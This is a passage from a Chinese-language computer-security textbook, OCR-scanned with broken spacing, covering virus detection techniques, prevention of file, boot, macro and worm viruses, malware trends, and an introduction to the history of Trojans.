五 是 容易 产生 误 报 ， 只 要 在 正常 程序 内 带 有 某 种 计算 机 病毒 的 特征 串 ， 即 使 该 代码 段 已 不 
可 能 被 执行 ， 而 只 是 被 杀 死 的 计算 机 病毒 体 残余 ， 扫 描 程序 仍 会 报警 第 六 是 难以 识别 多 
维 变形 病毒 。 不 管 怎样 ， 基 于 特征 代码 串 的 计算 机 病毒 扫描 法 仍 是 今天 用 得 最 为 普遍 的 查 
计算 机 病毒 方法 。 

4. 分 析 法 

此 种 方法 一 般 是 防 杀 计算 机 病毒 的 技术 人 员 使 用 。 使 用 分 析 法 的 目的 如 下 。 

(1) 确认 被 观察 的 磁盘 引导 扇 区 和 程序 中 是 否 含有 计算 机 病毒 。 

(2) 确认 计算 机 病毒 的 类 型 和 种 类 ， 判 定 其 是 否 是 一 种 新 的 计算 机 病毒 。 

(3) 明确 计算 机 病毒 体 的 大 致 结构 ， 提 取 特 征 识 别 用 的 字 节 串 或 特征 字 ， 用 于 增添 到 
计算 机 病毒 代码 库 供 病 毒 扫描 和 识别 程序 用 。 

(4) 详细 分 析 计 算 机 病毒 代码 ， 为 制定 相应 的 防 杀 计算 机 病毒 措施 制订 方案 。 

上 述 四 个 目的 按 顺序 排列 起 来 ， 正 好 是 使 用 分 析 法 的 工作 顺序 。 使 用 分 析 法 要 求 具有 
比较 全 面 的 有 关 计 算 机 、 操 作 系统 和 网 络 等 的 结构 和 功能 调用 以 及 关于 计算 机 病毒 方面 的 
各 种 知识 。 

使 用 分 析 法 检测 计算 机 病毒 ， 除 了 要 具有 相关 的 知识 外 ， 还 需要 反 汇 编 工 具 、 二 进 制 
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文件 编辑 器 等 分 析 用 工具 程序 和 专用 的 试验 计算 机 。 因 为 即使 是 很 熟练 的 防 杀 计算 机 病毒 
技术 人 员 ， 使 用 性 能 完善 的 分 析 软 件 ， 也 不 能 保证 在 短 时 间 内 将 计算 机 病毒 代码 完全 分 析 
清楚 。 而 计算 机 病毒 有 可 能 在 被 分 析 阶 段 继续 传染 甚至 发 作 ， 把 硬盘 内 的 数据 完全 毁坏 掉 ， 
这 就 要 求 分 析 工 作 必 须 在 专门 设立 的 试验 计算 机 机 上 进行 ， 不 怕 其 中 的 数据 被 破坏 。 在 不 
具备 条 件 的 情况 下 ， 不 要 轻易 开始 分 析 工作 ， 很 多 计算 机 病毒 都 采用 了 自 加 密 、 反 跟踪 等 
技术 ， 同 时 与 系统 的 牵扯 层次 很 深 ， 使 得 分 析 计 算 机 病毒 的 工作 变 得 异常 艰辛 。 

计算 机 病毒 检测 的 分 析 法 是 防 杀 计 算 机 病毒 工作 中 不 可 缺少 的 重要 技术 ， 任 何 一 个 性 
能 优良 的 防 杀 计算 机 病毒 系统 的 研制 和 开发 都 离 不 开 专门 人 员 对 各 种 计算 机 病毒 的 详尽 而 
认真 的 分 析 。 

分 析 的 步骤 分 为 静态 分 析 和 动态 分 析 两 种 。 静 态 分 析 是 指 利用 反 汇 编 工 具 将 计算 机 病 
毒 代 码 打印 成 清单 后 进行 分 析 ， 看 计算 机 病毒 分 成 哪些 模块 ， 使 用 了 哪些 系统 调用 ， 采 用 
了 哪些 技巧 , 并 将 计算 机 病毒 感染 文件 的 过 程 翻转 为 清除 该 计算 机 病毒 、 修 复 文件 的 过 程 ; 
判断 哪些 代码 可 被 用 做 特征 码 以 及 如 何 防御 这 种 计算 机 病毒 。 分 析 人 员 具 有 的 素质 越 高 ， 
分 析 过 程 越 快 、 理 解 越 深 。 动 态 分 析 则 是 指 利用 DEBUG 等 调试 工具 在 内 存 带 毒 的 情况 下 ， 
对 计算 机 病毒 做 动态 跟踪 ， 观 察 计算 机 病毒 的 具体 工作 过 程 ， 以 进一步 在 静态 分 析 的 基础 
上 理解 计算 机 病毒 工作 的 原理 。 当 计算 机 病毒 采用 了 较 多 的 技术 手段 时 ， 必 须 使 用 动 、 静 
相 结合 的 分 析 方 法 才能 完成 整个 分 析 过 程 。 

5. 人 工 智能 陷阱 技术 和 宏 病 毒 陷阱 技术 

人 工 智 能 陷阱 是 一 种 监测 计算 机 行为 的 常 驻 式 扫描 技术 。 它 将 所 有 计算 机 病毒 所 产生 
的 行为 归纳 起 来 ， 一 旦 发 现 内 存 中 的 程序 有 任何 不 当 的 行为 ， 系 统 就 会 有 所 警觉 ， 并 告知 
使 用 者 。 这 种 技术 的 优点 是 执行 速度 快 、 操 作 简 便 ， 且 可 以 侦 测 到 各 式 计 算 机 病毒 ， 缺 点 
是 程序 设计 难 ， 且 不 容易 考虑 周全 。 但 是 ， 人 工 智 能 陷阱 扫描 技术 是 一 个 具有 主动 保护 功 
能 的 新 技术 。 

宏 病毒 陷阱 技术 (MacroTrap) 是 结合 了 搜索 法 和 人 工 智 能 陷阱 技术 ， 依 行为 模式 来 侦 测 
已 知 及 未 知 的 宏 病毒 。 其 中 ， 配 合 OLE2 技术 ， 可 将 宏 与 文件 分 开 ， 使 得 扫描 速度 变 得 更 
快 ， 并 可 有 效 地 将 宏 病 毒 彻底 清除 。 

6. 软件 仿真 扫描 法 

该 技术 专门 用 来 对 付 多 态 变形 计算 机 病毒 (Polymorphic/MutationVirus)。 多 态 变 形 计算 
机 病毒 在 每 次 传染 时 ， 都 将 自身 以 不 同 的 随机 数 加 密 于 每 个 感染 的 文件 中 ， 传 统 搜索 法 对 
这 种 计算 机 病毒 无 能 为 力 。 而 软件 仿真 技术 则 可 成 功 地 仿真 CPU 执行 ,在 DOS 虚拟 机 
(Virtual Machine) 下 伪 执 行 计算 机 病毒 程序 , 安全 并 确实 地 将 其 解密 , 使 其 显露 本 来 的 面目 ， 
再 加 以 扫描 。 

7. 先知 扫描 法 


先知 扫描 技术 (VICE, Virus Instruction Code Emulatiom) 是 继 软 件 仿真 后 一 大 技术 上 的 突 
破 。 先 知 扫描 技术 将 专业 人 员 用 来 判断 程序 是 否 存在 计算 机 病毒 代码 的 方法 ， 分 析 归 纳 成 
专家 系统 和 知识 库 ， 再 利用 软件 模拟 技术 (Software Emulation) 伪 执行 新 的 计算 机 病毒 ， 超 
前 分 析出 新 计算 机 病毒 代码 ， 对 付 以 后 的 计算 机 病毒 。 
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4.3.2 ”常见 计算 机 病毒 的 防范 


1. 文件 型 计算 机 病毒 

文件 型 病毒 寄生 在 其 他 文件 中 ， 常 常 通过 对 它们 的 编码 加 密 或 使 用 其 他 技术 来 隐藏 自 
己 ， 它 动 夺 用 来 启动 主 程序 的 可 执行 命令 ， 用 作 它 自身 的 运行 命令 。 同 时 还 经 常 将 控制 权 
还 给 主 程序 ， 伪 装 计算 机 系统 正常 运行 。 一 旦 运行 被 感染 了 病毒 的 程序 文件 ， 病 毒 便 被 激 
发 ， 执 行 大 量 的 操作 ， 并 进行 自我 复制 ， 同 时 附着 在 系统 其 他 可 执行 文件 上 伪装 自身 ， 并 
留 下 标记 ， 以 后 不 再 重复 感染 。 特 点 : 主要 感染 可 执行 文件 的 病毒 ， 它 通常 隐藏 在 宿主 程 
序 中 ， 执 行 宿主 程序 时 ， 将 会 先 执行 病毒 程序 再 执行 宿主 程序 。 传 播 方式 : 当 宿 主 程序 运 
行 时 ， 病 毒 程序 首先 运行 ， 然 后 驻 留 在 内 存 中 ， 再 伺机 感染 其 他 的 可 执行 程序 ， 达 到 传播 
的 目的 。 感 染 对 象 : 主要 是 扩展 名 是 COM 或 者 EXE 的 文件 。 病 毒 典型 代表 是 CIH 病毒 ， 
别名 又 叫 Win95.CIH、Spacefiller、Win32.CIH、PE_CIH， 主 要 感染 Windows 95/98 下 的 可 
执行 文件 ， 在 Win NT 中 无 效 。 其 发 展 过 程 经 历 了 v1.0，v1.1、v1.2、v1.3、v1.4 总 共 5 个 
版 本 ， 人 危害 最 大 的 是 v1.2 版 本 ， 此 版 本 只 在 每 年 的 4 月 26 日 发 作 ， 又 称 为 切 尔 诺 贝 利 病 
毒 (前 苏联 核 事 故 纪念 日 )。CIH 病毒 发 作 时 ， 硬 盘 数 据 、 硬 盘 主 引导 记录 、 系 统 引 导 扇 区 、 
文件 分 配 表 被 覆盖 , 造成 硬盘 数据 特别 是 C 盘 数据 丢失 , 并 破坏 部 分 类 型 的 主板 上 的 Flash 
BIOS 导致 计算 机 无 法 使 用 ， 是 一 种 既 破 坏 软件 又 破坏 硬件 的 恶性 病毒 。 

对 于 文件 型 计算 机 病毒 的 防范 ， 一 般 采 用 以 下 方法 。 

(1) 安装 最 新 版 本 的 、 功 能 强大 的 著名 防 杀 计算 机 病毒 软件 ， 如 瑞星 、 卡 巴 斯 基 等 。 

(2) 及 时 更 新 查 杀 计算 机 病毒 引擎 ， 特 别 是 发 生计 算 机 病毒 突 发 事件 时 要 立即 更 新 。 

(3) 经 常 使 用 防 杀 计 算 机 病毒 软件 对 系统 进行 计算 机 病毒 检查 。 

(4) 对 关键 文件 ， 如 系统 文件 、 保 密 的 数据 等 ， 在 没有 计算 机 病毒 的 环境 下 经 常 
备份 。 

(5) 在 不 影响 系统 正常 工作 的 情况 下 对 系统 文件 设置 最 低 的 访问 权限 ， 以 防止 计算 机 
病毒 的 侵害 。 

(6) 当 使 用 Windows 操作 系统 时 ,修改 文件 夹 窗口 中 的 默认 属性 。 具 体操 作为 双击 鼠 
标 左 键 打开 “我 的 电脑 ”， 选 择 “ 查 看 ”菜单 中 的 “选项 ”命令 。 然 后 在 “查看 ”中 选择 
“显示 所 有 文件 ”选项 ， 去 掉 “ 隐 藏 已 知 文件 类 型 的 文件 扩展 名 ”选项 的 勾 选 ， 按 “确定 ” 
按钮 。 注 意 不 同 的 操作 系统 平台 可 能 显示 的 文字 有 所 不 同 。 

2. 引导 型 计算 机 病毒 


引导 型 病毒 寄生 在 主 引导 区 、 引 导 区 ， 病 毒 利用 操作 系统 的 引导 模块 放 在 某 个 固定 的 
位 置 ， 并 且 控制 权 的 转交 方式 是 以 物理 位 置 为 依据 ， 而 不 是 以 操作 系统 引导 区 的 内 容 为 依 
据 ， 因 而 病毒 占据 该 物理 位 置 即 可 获得 控制 权 ， 而 将 真正 的 引导 区 内 容 搬 家 转移 ， 待 病毒 
程序 执行 后 ， 将 控制 权 交 给 真正 的 引导 区 内 容 ， 使 得 这 个 带 病毒 的 系统 看 似 正 常 运转 ， 而 
病毒 已 隐藏 在 系统 中 并 伺机 传染 、 发 作 。 主 引导 记录 病毒 感染 硬盘 的 主 引 导 区 ， 如 大 麻 病 
毒 、2708 病毒 、 火 炬 病毒 等 ， 分 区 引导 记录 病毒 感染 硬盘 的 活动 分 区 引导 记录 ， 如 小 球 病 
毒 、 美 丽 女 孩 病 毒 等 。 
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引导 型 病毒 进入 系统 ， 一 定 要 通过 启动 过 程 ， 在 无 病毒 环境 下 使 用 的 软盘 或 硬盘 ， 即 
使 它 已 感染 引导 区 病毒 ， 也 不 会 进入 系统 并 进行 传染 ， 但 是 ， 只 要 用 感染 引导 区 病毒 的 磁 
盘 引导 系统 ， 就 会 使 病毒 程序 进入 内 存 ， 形 成 病毒 环境 。 

另外 ， 病 毒 的 一 部 分 仍 驻 留 在 内 存 中 ， 当 新 的 磁盘 插入 时 ， 病 毒 就 会 把 自己 写 到 新 的 
磁盘 上 。 当 这 个 盘 被 用 于 另 一 台 机 器 时 ， 病 毒 就 会 以 同样 的 方法 传播 到 那 台 机 器 的 引导 扇 
区 上 上 ; 

预防 引导 型 计算 机 病毒 ， 通 常 采 用 以 下 方法 。 

(1) 坚持 从 硬盘 引导 系统 。 

(2) 安装 能 够 实时 监控 引导 扇 区 的 防 杀 计 算 机 病毒 软件 ， 或 经 常用 能 够 查 杀 引导 型 计 
算 机 病毒 的 防 杀 计 算 机 病毒 软件 进行 检查 。 

(3) 经 常备 份 系统 引导 扇 区 。 

(4) 有 效 利 用 主板 上 提供 引导 扇 区 计算 机 病毒 保护 功能 (Virus Protect)。 

3. 宏 病 毒 

宏 病 毒 是 一 种 寄存 在 文档 或 模板 的 宏 中 的 计算 机 病毒 。 一 旦 打开 这 样 的 文档 ， 其 中 的 
宏 就 会 被 执行 ， 于 是 宏 病 毒 就 会 被 激活 ， 转 移 到 计算 机 上 ， 并 驻 留 在 Normal 模板 上 。 从 此 
以 后 ， 所 有 自动 保存 的 文档 都 会 “感染 ”上 这 种 宏 病 毒 ， 而 且 如 果 其 他 用 户 打 开 了 感染 病 
毒 的 文档 ， 宏 病毒 又 会 转移 到 他 的 计算 机 上 。 

如 果 并 不 希望 在 文档 中 包含 宏 ， 或 者 不 了 解 文档 的 确切 来 源 ， 例 如 ， 文 档 是 作为 电子 
邮件 的 附件 收 到 的 ， 或 是 来 自 网 络 ， 在 这 种 情况 下 ， 为 了 防止 可 能 发 生 的 病毒 传染 ， 打 开 
文档 过 程 中 出 现 宏 警 告 提 示 时 最 好 选择 “取消 安 ”。 

1) “ 宏 病 毒 的 判断 方法 

虽然 不 是 所 有 包含 宏 的 文档 都 包含 了 宏 病毒 ， 但 当 有 下 列 情况 之 一 时 ， 可 以 百分之百 
地 断定 你 的 Office 文档 或 Office 系统 中 有 宏 病 毒 。 

(1) 在 打开 “ 宏 病 毒 防护 功能 ”的 情况 下 ， 当 打开 一 个 文档 时 ， 系 统 会 弹出 相应 的 警 
告 框 。 而 并 没有 在 其 中 使 用 宏 或 并 不 知道 宏 到 底 怎么 用 ， 那 么 可 以 完全 肯定 这 个 文档 已 经 
感染 了 宏 病 毒 。 

(2) 同样 情况 下 ，Office 文档 中 一 系列 的 文件 在 打开 时 都 给 出 宏和 警告 。 可 以 肯定 这 些 
文档 中 有 宏 病 毒 。 

(3) 如 果 软 件 中 关于 宏 病 毒 防护 选 项 启用 后 ， 一 旦 发 现 你 的 机 器 中 设置 的 宏 病 毒 防护 
功能 选项 无 法 在 两 次 启动 Word 之 间 保 持 有 效 ， 则 系统 一 定 已 经 感染 了 宏 病 毒 。 也 就 是 说 
一 系列 Word 模板 、 特 别 是 normal.dot 已 经 被 感染 。 

总 之 ， 鉴 于 绝 大 多 数 人 都 不 需要 或 者 不 会 使 用 “ 宏 ” 这 个 功能 ， 我 们 可 以 得 出 一 个 相 
当 重 要 的 结论 : 如 果 Office 文档 在 打开 时 ， 系 统 给 出 一 个 宏 病 毒 警告 框 ， 那 么 应 该 对 这 个 
文档 保持 高 度 警 惕 ， 它 已 被 感染 的 几率 极 大 。 注 意 : 简单 地 删除 被 宏 病毒 感染 的 文档 并 不 
能 清除 Office 系统 中 的 宏 病 毒 ! 

2) ” 宏 病 毒 的 防治 和 清除 

(1) 用 最 新 版 的 反 病毒 软件 清除 宏 病 毒 。 

使 用 反 病 毒 软件 是 一 种 高 效 、 安 全 和 方便 的 清除 方法 ， 也 是 一 般 计算 机 用 户 的 首选 
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方法 。 

因此 ， 对 付 宏 病毒 应 该 和 对 付 其 他 种 类 的 病毒 一 样 ， 也 要 尽量 使 用 最 新 版 的 查 杀 病毒 
软件 。 无 论 你 使 用 的 是 何 种 反 病毒 软件 ， 及 时 升级 是 非常 重要 的 。 

(2) 用 写字 板 或 Word 6.0 文档 作为 清除 宏 病毒 的 桥梁 。 

如 果 Word 系统 没有 感染 宏 病 毒 ， 但 需要 打开 某 个 外 来 的 ， 己 查 出 感染 有 宏 病 毒 的 文 
档 ， 而 手头 现 有 的 反 病 毒 软件 又 无 法 查 杀 它们 ， 那 么 可 以 试验 用 下 面 的 方法 来 查 杀 文档 中 
的 宏 病 毒 ， 打 开 这 个 包含 了 宏 病 毒 的 文档 (当然 是 启用 Word 中 的 “ 宏 病 毒 防护 ”功能 ， 并 
在 宏和 警告 出 现时 选择 “取消 宏 ”)， 然 后 在 “文件 ”菜单 中 选择 “另存 为 ”命令 ,将 此 文档 
改 存 成 写字 板 (RTF) 格 式 或 Word#6.0 格式 。 存 盘 后 应 该 检查 一 下 文档 的 完整 性 ， 如 果 文 档 
内 容 没 有 任何 丢失 ， 并 且 在 重新 打开 此 文档 时 不 再 出 现 宏 警告 则 大 功 告 成 。 

4. 蠕虫 病毒 

蠕虫 病毒 是 一 种 常见 的 计算 机 病毒 。 它 是 利用 网 络 进行 复制 和 传播 的 ， 传 染 途 径 是 通 
过 网 络 和 电子 邮件 。 最初 的 蠕虫 病毒 定义 是 因为 在 DOS 环境 下 ,病毒 发 作 时 会 在 屏幕 上 出 
现 一 条 类 似 虫 子 的 东西 ， 胡 乱 吞 吃 屏 幕 上 的 字母 并 将 其 改 形 。 

蠕虫 病毒 有 时 也 叫 “ 野 免 ”， 它 一 般 是 通过 1434 端口 漏洞 传播 。“ 尼 姆 亚 ” 病毒 、“ 能 
猫 烧 香 ” 以 及 其 变种 也 是 蠕虫 病毒 ， 这 一 病毒 是 利用 了 微软 视窗 操作 系统 的 漏洞 。 计 算 机 
感染 这 一 病毒 后 , 会 不 断 自动 拨号 上 网 ， 并 利用 文件 中 的 地 址 信息 或 者 网 络 共享 进行 传播 ， 
最 终 破坏 用 户 的 大 部 分 重要 数据 。 

蠕虫 病毒 的 一 般 防 治 方法 是 : 使 用 具有 实时 监控 功能 的 杀毒 软件 ， 并 且 注 意 不 要 轻易 
打开 不 熟悉 的 邮件 附件 。 

蠕虫 和 普通 病毒 不 同 的 一 个 特征 是 蠕虫 病毒 往往 能 够 利用 漏洞 ， 这 里 的 漏洞 或 者 说 是 
缺陷 ， 可 以 分 为 两 种 ， 即 软件 上 的 缺陷 和 人 为 的 缺陷 。 人 为 的 缺陷 ， 主 要 指 的 是 计算 机 用 
户 的 疏忽 。 这 就 是 所 谓 的 社会 工程 学 (social engineering)， 当 收 到 一 封 带 着 病毒 的 求职 信 邮 
件 时 ， 大 多 数 人 都 会 抱 着 好 奇 去 点 击 的 。 对 于 企业 用 户 来 说 ， 威 胁 主要 集中 在 服务 器 和 大 
型 应 用 软件 的 安全 上 ， 而 对 个 人 用 户 而 言 ， 主 要 是 防范 第 二 种 缺陷 。 

个 人 用 户 对 蠕虫 病毒 的 防范 措施 有 以 下 几 点 : 

(1) 选 购 合 适 的 杀毒 软件 。 

(2) 经 常 升级 病毒 库 。 蠕 虫 病毒 的 传播 速度 快 、 变 种 多 ， 所 以 必须 随时 更 新 病毒 库 ， 
以 便 能 够 查 杀 最 新 的 病毒 。 

(3) 提高 防 杀 毒 意识 。 不 要 轻易 去 点 击 陌生 的 站 点 ， 有 可 能 里 面 就 含有 恶意 代码 ! 

当 运 行 下 时 ， 选 择 “ 工 具 ” 一 “Intemet 选项 ”。 在 弹出 的 对 话 框 中 ， 单 击 “ 安 全 ” 
选项 卡 。 然 后 单 击 “ 默 认 级 别 ” 按 钮 ， 把 安全 级 别 由 “中 ” 改 为 “高 ”。 

(4) 不 随意 查看 陌生 邮件 ， 尤 其 是 带 有 附件 的 邮件 。 

防止 系统 漏洞 类 蠕虫 病毒 的 侵害 ， 最 好 的 办 法 是 打 好 相应 的 系统 补丁 ， 可 以 应 用 瑞星 
杀毒 软件 的 “漏洞 扫描 ”工具 ， 这 款 工具 可 以 引导 用 户 打 好 补丁 并 进行 相应 的 安全 设置 ， 
彻底 杜绝 病毒 的 感染 。 

防范 邮件 蠕虫 的 最 好 办 法 ， 就 是 提高 自己 的 安全 意识 ， 不 要 轻易 打开 带 有 附件 的 电子 
邮件 。 另 外 ， 启 用 瑞星 杀毒 软件 的 “邮件 发 送 监控 ”和 “邮件 接收 监控 ”功能 ， 也 可 以 提 
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高 自己 对 病毒 邮件 的 防护 能 力 。 
4.3.3 ”计算 机 病毒 未 来 发 展 趋势 


从 目前 病毒 的 演化 趋势 来 看 ， 病 毒 的 发 展 趋势 主要 体现 在 以 下 几 个 方面 。 
1. 主流 病毒 皆 为 综合 利用 多 种 编程 新 技术 产生 


从 Rootkit 技术 到 映 象 劫持 技术 , 从 磁盘 过 滤 驱 动 到 还 原 系 统 SSDT HOOK 和 还 原 其 他 
内 核 HOOK 技术 ， 这 些 新 技术 都 成 了 病毒 为 达到 目的 所 采取 的 手段 。 通 过 Rootkit 技术 和 
映 象 动 持 技术 隐藏 自身 的 进程 、 注 册 表 键 值 ， 通 过 插入 进程 、 线 程 避 免 被 杀毒 软件 查 杀 ， 
通过 实时 监测 对 自身 进程 进行 回 写 ， 避 免 被 杀毒 软件 查 杀 ， 通 过 还 原 系统 SSDT HOOK 和 
还 原 其 他 内 核 HOOK 技术 破坏 反 病毒 软件 , 其 中 仅 映 象 劫持 技术 就 包括 “进程 映像 劫持 ”、 
“磁盘 映像 劫持 ”、“ 域 名 映像 劫持 ”、“ 系 统 DLL 动态 链接 库 映 像 动 持 ” 等 多 种 方式 。 
未 来 的 计算 机 病毒 将 综合 利用 以 上 新 技术 ， 使 得 杀毒 软件 查 杀 难度 更 大 。 

2. ARP 病毒 仍 是 局 域 网 的 最 大 祸害 

ARP 病毒 已 经 成 为 近年 来 企业 、 网 吧 、 校 园 网 络 等 局 域 网 的 最 大 威胁 。 此 类 病毒 采用 
ARP 局 域 网 挂 马 攻击 技术 ， 利 用 MAC 地 址 欺骗 ， 传 播 恶 意 广 告 或 病毒 程序 ， 使 得 ARP 病 
毒 猩 狐 一 时 。ARP 病毒 发 作 时 ， 通 常会 造成 网 络 掉 线 ， 但 网 络 连接 正常 ， 内 网 的 部 分 电脑 
不 能 上 网 ， 或 者 所 有 电脑 均 不 能 上 网 ， 无 法 打开 网 页 或 打开 网 页 慢 以 及 局 域 网 连接 时 断 时 
续 并 且 网 速 较 慢 等 现象 。 更 为 严重 的 是 ，ARP 病毒 新 变种 能 够 把 自身 伪装 成 网 关 ， 在 所 有 
用 户 请 求 访问 的 网 页 添加 恶意 代码 ， 导 致 杀毒 软件 在 用 户 访问 任意 网 站 均 发 出 病毒 警报 ， 
用 户 下 载 任何 可 执行 文件 ， 均 被 替换 为 病毒 ， 严 重 影响 到 企业 网 络 、 网 吧 、 校 园 网 络 等 局 
域 网 的 正常 运行 。 

虽然 在 各 大 安全 厂商 的 努力 下 ，ARP 病毒 得 到 了 有 效 过 制 ， 但 由 于 众多 中 小 企业 用 户 
没有 对 此 病毒 的 危害 给 予 足够 重视 ， 没 有 采取 相应 的 防范 措施 ， 因 此 ， 此 类 病毒 在 很 长 一 
段 时 间 内 仍 为 局 域 网 的 主要 祸害 。 

3. 网 游 病毒 把 逐 利 当 作 唯 一 目标 

受 经 济 利益 驱 使 ， 利 用 键盘 钩子 、 内 存 截取 或 封包 截取 等 技术 盗 取 网 络 游戏 玩家 的 游 
戏 账号 、 游 戏 密码 、 所 在 区 服 、 角 色 等 级 、 金 钱 数量 、 仓 库 密码 等 信息 资料 的 病毒 十 分 活 
跃 。2008 年 上 半年 截获 的 新 木马 病毒 中 ，80% 以 上 都 与 盗 取 网 络 游戏 账号 密码 有 关 。 病 毒 
作者 盗 取 互联 网 上 有 价值 的 信息 和 资料 后 转卖 获取 利益 的 目标 十 分 明确 ， 逐 利 已 成 为 此 类 
病毒 的 唯一 动机 和 目标 ， 随 着 网 络 游戏 的 火爆 和 兴盛 ， 此 类 病毒 仍然 有 着 庞大 的 市 场 和 生 
存 空间 ， 仍 将 成 为 未 来 病毒 的 主流 。 

4. 不 可 避免 的 面 对 驱 动 级 病毒 

2008 年 以 来 ， 大 部 分 主流 病毒 技术 都 进入 了 驱动 级 ， 病 毒 已 经 不 苹 杀 毒 软件 追 杀 ， 而 
是 主动 与 杀毒 软件 争 抢 系统 驱动 的 控制 权 , 在 争 抢 系 统 驱 动 控制 权 后 , 转 而 控制 杀毒 软件 ， 
使 杀毒 软件 功能 失效 。 病 毒 通过 生成 驱动 程序 ， 与 杀毒 软件 争 抢 系 统 控制 权限 ， 通 过 修改 
SSDT 表 等 技术 实现 WINDOWS APIHOOK， 从 而 使 得 杀毒 软件 监控 功能 失效 。 
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病毒 作者 通过 以 上 几 种 形式 传播 病毒 ， 主 要 目标 还 是 瞄准 经 济 利益 。 一 旦 用 户 电脑 染 
毒 后 ， 染 毒 电脑 中 所 有 的 有 价值 的 信息 ， 包 括 网 络 游戏 账号 密码 、 网 上 银行 账号 密码 、 网 
上 证 券 交易 账号 密码 都 面临 着 被 盗 的 危险 ， 因 此 需要 引起 用 户 的 足够 重视 。 

计算 机 病毒 表现 出 的 众多 新 特征 以 及 发 展 趋势 表明 ， 目 前 计算 机 安全 形势 仍然 十 分 严 
峻 ， 反 病毒 业 面 临 着 巨大 的 挑战 ， 需 要 不 断 地 研发 推出 更 加 先进 的 计算 机 反 病 毒 技术 ， 才 
能 应 对 和 超越 计算 机 病毒 的 发 展 ， 为 电脑 和 网 络 用 户 提供 切实 的 安全 保障 。 


4.4 木马 病毒 


4.4.1 木马 的 概述 


木马 (Trojan) 这 个 名 字 来 源 于 古 希腊 传说 ( 荷 马 史诗 中 木马 计 的 故事 , Trojan 一 词 的 本 意 
是 特洛伊， 即 指 特洛伊 木马 ， 也 就 是 木马 计 的 故事 )。 

“木马 ”程序 是 目前 比较 流行 的 病毒 文件 ， 与 一 般 的 病毒 不 同 ， 它 不 会 自我 繁殖 ， 也 
并 不 “刻意 ”地 去 感染 其 他 文件 ， 它 通过 将 自身 伪装 吸引 用 户 下 载 执行 ， 向 施 种 木马 者 提 
供 打开 被 种 者 电脑 的 门户 ， 使 施 种 者 可 以 任意 毁坏 、 窃 取 被 种 者 的 文件 ， 甚 至 远程 操控 被 
种 者 的 电脑 。 木 马 的 作用 是 赤裸 裸 地 偷偷 监视 别人 和 盗窃 别人 的 密码 、 数 据 等 。“ 木 马 ” 
与 计算 机 网 络 中 常常 要 用 到 的 远程 控制 软件 有 些 相 似 ， 但 由 于 远程 控制 软件 是 “善意 ”的 
控制 ， 因 此 通常 不 具有 隐蔽 性 ; “木马 ” 则 完全 相反 ， 它 要 达到 的 是 “偷窃 ”性 的 远程 控 
制 ， 如 果 没 有 很 强 的 隐蔽 性 的 话 ， 那 就 是 “ 毫 无 价值 ”的 。 

木马 通过 一 段 特定 的 程序 (木马 程序 ) 来 控制 另 一 台 计 算 机 。 它 通常 有 两 个 可 执行 程序 : 
一 个 是 客户 端 ， 即 控制 端 ， 另 一 个 是 服务 端 ， 即 被 控制 端 。 植 入 被 种 者 电脑 的 是 “服务 器 ” 
部 分 ， 而 所 谓 的 “黑客 ” 正 是 利用 “控制 器 ”进入 运行 了 “服务 器 ”的 电脑 。 运 行 了 木马 
程序 的 服务 器 ， 被 种 者 的 电脑 就 会 有 一 个 或 几 个 端口 被 打开 ， 使 黑客 可 以 利用 这 些 打开 的 
端口 进入 电脑 系统 ,安全 和 个 人 隐私 也 就 全 无 保障 了 ! 木马 的 设计 者 为 了 防止 木马 被 发 现 ， 
而 采用 多 种 手段 隐藏 木马。 木马 程序 一 旦 运行 并 被 控制 端 连接 ， 其 控制 端 将 享有 服务 端的 
大 部 分 操作 权限 ， 例 如 给 计算 机 增加 口令 、 浏 览 、 移 动 、 复 制 、 删 除 文件 、 修 改 注 册 表 、 
更 改 计算 机 配置 等 。 


4.4.2 ”木马 的 发 展 历史 


计算 机 世界 中 的 特洛伊 木马 病毒 的 名 字 由 《 荷 马 史诗 》 的 特洛伊 战争 得 来 。 故 事 说 的 
是 希腊 人 围攻 特洛伊 城 十 年 后 仍 不 能 得 手 ， 于 是 阿 伽 门 农 受 雅典 娜 的 启发 : 把 士兵 藏匿 于 
巨大 无 比 的 木马 中 ， 然 后 伴 作 退兵 。 当 特洛伊 人 将 木马 作为 战利品 拖 入 城内 时 ， 高 大 的 木 
马 正 好 卡 在 城 门 间 ， 进 退 两 难 。 夜 晚 木马 内 的 士兵 候 出 来 ， 与 城 外 的 部 队 里 应 外 合 而 攻 下 
了 特洛伊 城 。 而 计算 机 世界 的 特洛伊 木马 (Trojan) 是 指 隐藏 在 正常 程序 中 的 一 段 具有 特殊 功 
能 的 恶意 代码 ， 是 具备 破坏 和 删除 文件 、 发 送 密码 、 记 录 键 盘 和 攻击 DOS 等 特殊 功能 的 后 
门 程序 。 

木马 的 发 展 历史 分 为 以 下 几 个 阶段 : 
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1) ”伪装 性 病毒 

这 种 病毒 通过 伪装 成 一 个 合法 性 程序 诱骗 用 户 上 当 。 世 界 上 第 一 个 计算 机 木马 是 出 现 
在 1986 年 的 PC-Write 木马 。 它 伪装 成 共享 软件 PC-Write 的 2.72 版 本 (事实 上 , 编写 PC-Write 
的 Quicksoft 公司 从 未 发 行 过 2.72 版 本 )， 一 旦 用 户 信以为真 运行 该 木马 程序 ， 那 么 他 的 下 
场 就 是 硬盘 被 格式 化 。 

2) ”AIDS 型 木马 

继 PC-Write 之 后 ，1989 年 出 现 了 AIDS 木马 。 由 于 当时 很 少 有 人 使 用 电子 邮件 ， 所 以 
AIDS 的 作者 就 利用 现实 生活 中 的 邮件 进行 散播 : 给 其 他 人 寄 去 一 封 封 含有 木马 程序 软盘 的 
邮件 。 之 所 以 叫 这 个 名 称 是 因为 软盘 中 包含 有 AIDS 和 HIV 疾病 的 药品 、 价 格 、 预 防 措施 
等 相关 信息 。 软 盘 中 的 木马 程序 在 运行 后 ， 虽 然 不 会 破坏 数据 ， 但 是 它 将 硬盘 加 密 锁 死 ， 
然后 提示 受 感染 用 户 花 钱 消 灾 。 

3) 网 络 传播 性 木马 

随 着 Internet 的 普及 ， 这 一 代 木 马 兼备 伪装 和 传播 两 种 特征 ， 并 结合 TCP/IP 网 络 技术 
四 处 泛滥 。 同 时 它 还 具有 新 的 特征 : 

(1) 添加 了 “后 门 ”功能 。 

所 谓 后 门 就 是 一 种 可 以 为 计算 机 系统 秘密 开启 访问 入 口 的 程序 。 一 旦 被 安装 ， 这 些 程 
序 就 能 够 使 攻击 者 绕 过 安全 程序 进入 系统 。 该 功能 的 目的 就 是 收集 系统 中 的 重要 信息 ， 例 
如 : 财务 报告 、 口 令 及 信用 卡号 。 此 外 ， 攻 击 者 还 可 以 利用 后 门 控制 系统 ， 使 之 成 为 攻击 
